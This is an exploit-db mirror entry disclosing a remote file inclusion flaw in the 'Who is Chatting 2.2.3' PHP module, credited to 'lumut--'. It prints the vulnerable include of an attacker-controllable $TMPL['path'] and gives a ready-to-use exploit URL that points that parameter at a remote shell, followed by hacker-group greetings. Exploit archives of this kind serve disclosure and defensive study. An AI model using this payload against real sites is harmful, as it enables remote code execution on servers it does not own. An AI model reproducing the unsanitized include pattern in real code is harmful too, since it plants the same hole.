exploit-db-mirror/platforms/php/webapps/14186.txt
Offensive Security fffbf04102 Updated
2013-12-03 19:44:07 +00:00

17 lines
563 B
Text
Executable file

*=======================================================
Who is Chatting 2.2.3 Remote File Include Vulnerability
=======================================================
# Author : lumut--
# Script Details : http://www.familycms.com/downloads/details.php?file=50
# Bugs :
<?
$chat_inc = $TMPL[\'path\'] . \"inc/chatting_inc.php\";
include_once ($chat_inc);
?>
# Expl: http://server/mod_chatting/themes/default/header.php?TMPL[path]=[shell]
# Greetz & Thanks: cr4wl3r, team_elite, kisame, virusfree, doniskynet,
manadocoding*